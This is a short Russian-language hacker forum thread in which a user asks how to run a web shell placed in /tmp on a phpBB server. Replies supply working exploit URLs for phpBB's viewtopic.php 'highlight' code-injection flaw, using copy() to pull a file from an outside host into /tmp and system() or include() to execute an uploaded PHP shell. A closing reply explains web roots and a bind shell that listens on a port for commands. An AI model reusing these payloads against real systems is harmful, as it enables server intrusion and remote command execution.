Я знаю что вех уже задолбал phpBB но я хочу коешто уточнить. Говорят что на 90% компов папка /tmp открыта для записи. Я верю но, даже если я залью шелл в /tmp, как я могу его запустить из браузера. Жду ответов.
Вот такой. viewtopic.php?a=http://seechat.fatal.ru/sql.hp&b=/tmp/remview.php&t=470&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527
если файл 1.php лежит в /tmp, то можешь запустить так viewtopic.php?t=[topic]&highlight=%2527.system($_GET[cmd]).%2527&cmd=php /tmp/1.php
viewtopic.php?t=[topic]&highlight=%2527.include($_GET[cmd]).%2527&cmd=/tmp/1.php хотя не обязательно сработает, но попытка - не пытка =)
кароче обьясню на пальцах. пример: Ставим апаче. Диск С это диск, который юзверь не видит. Папка html это папка откуда грузится сайт. Так вот если нужно что-бы веб-шелл грузил по такому методу http://bla-bla.ru/shell/shell.php то он должен быть залить в папку /html/shell/ а если ты зальеш выше папки html то ты его просто не откроеш Случай 2. Заливаем на диск С файл, который открывает на серваке порт и ждет команд, коннектимся к серву на этот порт и вот у нас шелл =) ЗЫ Обьяснял на пальцах. Нимного не так. Если учесть что большинство серваков стоят на никсах и там нету диска С, но суть помойму высказал. ЗЗЫ Многие серваки просто не пустят в папку /tmp =)
